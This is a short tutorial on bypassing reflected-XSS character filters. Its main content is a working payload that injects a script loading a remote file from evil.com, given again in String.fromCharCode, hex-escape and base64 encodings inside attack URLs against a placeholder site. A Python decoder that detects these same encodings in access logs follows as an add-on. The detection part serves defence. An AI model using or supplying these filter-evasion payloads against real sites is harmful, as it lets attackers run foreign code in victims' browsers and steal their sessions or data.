XSS (encoding/decoding issues)

Sometimes you find a reflection in which certain characters (like = or space) are not allowed. Let's say there is an XSS at www.xyz.org/?s=<xss here>, but if you type <script src="…"> it does not reflect properly because of the equals sign and the space. The example below shows how the space-character problem can be bypassed:

<script>s=document.createElement('script');s.src='http://evil.com:11000/somefile.js';document.head.appendChild(s);</script>  

But what if the equals sign is not allowed either? Then use document.write together with String.fromCharCode, so the payload contains no literal = or space at all. An encoder can be found here: https://eve.gd/2007/05/23/string-fromcharcode-encoder/

The above example could be encoded as follows:

http://www.xyz.org/?s=%3Cscript%3Edocument.write( String.fromCharCode(60,115,99,114,105,112,116,62,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,101,118,105,108,46,99,111,109,58,49,49,48,48,48,47,115,111,109,101,102,105,108,101,46,106,115,39,59,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,60,47,115,99,114,105,112,116,62,32,32))%3C/script%3E 

Other ways:

Hex encoding (use https://dencode.com/en/string/unicode-escape, then search-and-replace \u00 with %5cx so each character becomes a URL-encoded \xNN escape)

http://www.xyz.org/?s=write('%5cx3c%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx3e%5cx73%5cx3d%5cx64%5cx6f%5cx63%5cx75%5cx6d%5cx65%5cx6e%5cx74%5cx2e%5cx63%5cx72%5cx65%5cx61%5cx74%5cx65%5cx45%5cx6c%5cx65%5cx6d%5cx65%5cx6e%5cx74%5cx28%5cx27%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx27%5cx29%5cx3b%5cx73%5cx2e%5cx73%5cx72%5cx63%5cx3d%5cx27%5cx68%5cx74%5cx74%5cx70%5cx3a%5cx2f%5cx2f%5cx65%5cx76%5cx69%5cx6c%5cx2e%5cx63%5cx6f%5cx6d%5cx3a%5cx31%5cx31%5cx30%5cx30%5cx30%5cx2f%5cx73%5cx6f%5cx6d%5cx65%5cx66%5cx69%5cx6c%5cx65%5cx2e%5cx6a%5cx73%5cx27%5cx3b%5cx64%5cx6f%5cx63%5cx75%5cx6d%5cx65%5cx6e%5cx74%5cx2e%5cx68%5cx65%5cx61%5cx64%5cx2e%5cx61%5cx70%5cx70%5cx65%5cx6e%5cx64%5cx43%5cx68%5cx69%5cx6c%5cx64%5cx28%5cx73%5cx29%5cx3b%5cx3c%5cx2f%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx3e%5cx20%5cx20)'

Base64

http://www.xyz.org/?s=write(atob('PHNjcmlwdD5zPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3Muc3JjPSdodHRwOi8vZXZpbC5jb206MTEwMDAvc29tZWZpbGUuanMnO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQocyk7PC9zY3JpcHQ+ICA='))
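As an added defender's example (not code from the original post), a small Python normalizer that peels the URL, String.fromCharCode, \x/\u and atob layers shown above off a query-string value and reports which indicators survive. The sample values are constructed from the post's own encodings, and the indicator names are my own.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample values of the ?s= parameter (not captured traffic). Each hides
# the post's loader behind one of the encodings it walks through; "benign" is a control.
SAMPLES = {
    "charcode": "%3Cscript%3Edocument.write(String.fromCharCode(115,46,115,114,99,61,39,104,116,116,112,58,47,47,101,118,105,108,46,99,111,109,58,49,49,48,48,48,47,115,111,109,101,102,105,108,101,46,106,115,39))%3C/script%3E",
    "hex": "write('%5cx3c%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx3e')",
    "base64": "write(atob('PHNjcmlwdD5zPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3Muc3JjPSdodHRwOi8vZXZpbC5jb206MTEwMDAvc29tZWZpbGUuanMnO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQocyk7PC9zY3JpcHQ+ICA='))",
    "benign": "search%20term%20with%20%3D%20and%20spaces",
}

CHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]*)\)")
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]*)['\"]\s*\)")
OBFUSCATION = re.compile(r"fromCharCode|atob\(|\\x[0-9a-fA-F]{2}", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
REMOTE_SRC = re.compile(r"\.src\s*=", re.IGNORECASE)


def _b64(match):
    # Malformed base64 is left in place rather than crashing the detector.
    try:
        return base64.b64decode(match.group(1), validate=True).decode("latin-1")
    except ValueError:
        return match.group(0)


def decode_layers(raw, max_rounds=5):
    """Peel %XX, fromCharCode(), \\xNN/\\uNNNN and atob() wrapping until stable."""
    text = unquote(raw)  # plain %XX only; whether '+' means space is app-specific
    for _ in range(max_rounds):
        previous = text
        text = CHARCODE.sub(lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))), text)
        text = ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)
        text = ATOB.sub(_b64, text)
        if text == previous:
            break
    return text


def indicators(raw):
    """Names of the signals found in the parameter value (empty set means clean)."""
    found = set()
    if OBFUSCATION.search(unquote(raw)):
        found.add("obfuscation")
    decoded = decode_layers(raw)
    if SCRIPT_TAG.search(decoded):
        found.add("script_tag")
    if REMOTE_SRC.search(decoded):
        found.add("remote_src")
    return found
```

Run `indicators(value)` over each query-string value from your access logs; anything that is clean before decoding but carries a script tag or `.src=` afterwards is exactly the filter-bypass pattern this post describes.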
